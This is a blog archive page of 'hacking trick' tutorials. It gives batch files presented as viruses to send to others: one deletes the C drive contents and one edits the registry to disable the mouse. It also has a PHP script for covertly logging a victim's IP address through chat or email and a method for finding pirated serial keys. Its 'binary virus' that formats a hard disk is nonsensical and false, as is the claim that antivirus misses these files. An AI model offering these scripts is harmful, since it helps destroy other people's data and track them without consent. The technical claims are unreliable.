Posts

Showing posts from July, 2014

Block Facebook On Your Computer In Few Simple Steps

Image
In this tutorial i will  teach  you to specifically block facebook on  your computer. This might be helpfull if you want to prevent students from using facebook  in school and colleges or your employees in office. If you are parent and don't want you child to use facebook or any other particular site then follow simple steps given below. So lets get started. How To Block Facebook ? 1. Go to  Start  >   Programmes  >  Accesories 2. Then Right click on Notepad and Run it as  administrato r. 3. Now open  host file  by clicking on  File  >  O pen  and locate to following address       C:\WINDOWS\system32\drivers\etc 4. Then just below  # 127.0.0.1 localhost  paste folowing code # Blocking Facebook 127.0.0.1  login .facebook.com 127.0.0.1 www.facebook.com 127.0.0.1 apps.facebook.com 127.0.0.1 blog.facebook.com 5. Now  save  the  host file  and done. 6. Open any browser and try to open facebook. It won't open. If facebook opens then you might have d

How To Grab Someone IP Address ? .

Image
In this tutorial i will you show you how to grab someone  Ip address  using  PHP script. This method can be used to grab someone Ip address on yahoo or  Facebook  chat or by sending mail to victim. So Lets get started. How To Hack Someone Ip Address ?     1. Copy the below codes into  Notepad   and  save it  as  Grab.php  (.php is must)  <?php $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']); $img_number = imagecreate(400,95); $backcolor = imagecolorallocate($img_number,10,102,153); $textcolor = imagecolorallocate($img_number,255,255,255); imagefill($img_number,0,0,$backcolor); $number0 = " This is Your IP/Proxy"; $number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]"; $number2 = " Host/Proxy: $hostname"; $number4 = " _________________________________"; Imagestring($img_number,10,5,5,$number0,$textcolor); Imagestring($img_number,10,5,25,$number1,$textcolor); Imagestring($img_number,10,5,45,$number2,$textcolor); Imagestring($img

Learn To Make Dangerous Virus In A Minute .

Image
In my previous post i had teach you guys to create  virus that disable mouse  and Virus to format Hard Disk . In this post i will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus. What will this virus do ?   You will create this virus using batch file programming. This virus will  delete  the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about  Learn Batch Programming . How to Make the virus ?    1. Open  Notepad  and copy below  code  into it. @Echo off Del C:\ *.* |y    2. Save this file as  virus.bat  (Name can be  anything but  .bat is must)    3. Now, running this file will  delete  all the  content of   C Drive . Warning:  Please don't try to run on your o

Create Binary Virus To Format Hard Disk .

Image
Today i will show you to make a virus to  format Hard disk  using binary code. You can send this file  to your friend or enemy to format their Hard disk. But please don't try this on your own computer or else you will end up formatting your own computer. How To Create Virus To Format Hard Drive ?    1.  Copy  the below codes into  Notepad . 01001011000111110010010101010101010000011111100000    2. Save the file as  Format.exe    3.   You just created virus to format Hard Drive. Enjoy !!! If for some reason this does not work for you then check out below tutorial Learn To Make Dangerous Virus To Format Hard Drive

Make A Virus That Disable Mouse .

Image
I had previously posted on making different   batch files  like  matrix effect ,  opening no of websites with one click  which were interesting and completely harmless but today we will be making a batch virus which is harm-full it will  disable your mouse  so think before trying it on yourself. How To Disable Mouse   1. Open  Notepad   and copy below codes rem --------------------------------- rem  Disable Mouse set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" reg  delete  %key% reg add %key% /v Start /t REG_DWORD /d 4 rem ---------------------------------   2. Save this file as   virus.bat   3. Done you just created your virus.

How To Open Number Of Sites With A Single Click ?

Image
Today i will show you  how to make  a  batch file  which will open number of websites with just one  click. You can also use this method to open different computer programmes like internet explorer,  notepad  etc. How To Do ?   1. Open  Notepad  and copy below codes @echo off start www.coolhackingtrick.com/ start www.google.com start www.facebook.com   2. Save this file as   batch.bat   3. Now open your save file and it will open three websites with just one click.   4. You can also add more sites by writing  Start  followed by  websites URL .

Advance Matrix Effect Using Notepad .

I had previously posted about  Matrix effect using Notepad   . But this is more advance and it looks more realistic then the previous one. So open up your  notepad  and get started. How To Create Matrix File ?   1. Open  Notepad   and copy below code. @echo off color 0A :A echo b r E w e 4 e T r 8 M e F r a c h a S t 3 D a C r a s p e s T e 4 h 2 w r e G 2 ping -w .9 >nul echo R E 9 8 8 R a t r e g 6 n u m A b R E X e Y A T u C 7 a D R a c r u C e B E p e ping -w .9 >nul echo c E B E s A d R u B R 3 H e R u D 7 g u d U 7 T a b u T 5 e p E 2 a v e 6 8 a Z ping -w .9 >nul echo n u r A X a j a s t a 9 h a 6 e h e G a s u t r a t r A y a f E q u 8 u b R u d ping -w .9 >nul echo k u v e 4 E 6 3 e t r a d r e f e y e q e 6 U H e z U b r u R a s 2 4 3 r A N a ping -w .9 >nul echo v u P R a b R u c e d U s w a h a c r a t h U 7 r a h u t u h u V e 7 U k u S a ping -w .9 >nul echo T e D r e 8 A p r a d a b u f U c u c E h E t 7 c r 5 s P a f r e t h u t 9 u t ping -w .9

Matrix Effect Using Notepad .

Image
This is amazing  notepad  trick which will display  matrix  effect  like you might have seen in movies, that is numbers flashes  in green  colour. Basically we will be creating a small  batch file   in  notepad . Go to  Notepad  and copy below codes @echo off color 02 :start echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% goto start Save this file as  matrix.bat  Now open this file as see matrix effect on your screen.

Finding Serial Key Of Any Software Using Simple Google Trick .

Image
Most of you download and use pirated  software  from torrents or any such other sites, but sometime it gets very difficult to find serial key of those softwares. I will make it easy for you by showing you simple yet very  intersting google trick  which will allow you to find serial key of any software very easily. How To Find Serial Key Of Any Software ? The key  94FBR  is a part of  Office 2000 Pro CD activation key that is widely distributed as it bypasses the activation requirements of Office 2000 Pro. By searching for 94fbr and the product name, you are guarantee that the pages that are returned are pages dealing specifically with the product you're wanting a serial for. Follow simple steps given below to learn this trick     1. Go to  Google     2. Then type   Software Name  94FBR Replace  Software Name  with the name of software whose serial key you want to find Eg: To find serial key of Nero i will type  Nero  94fbr     3. Now press  Enter  and you will find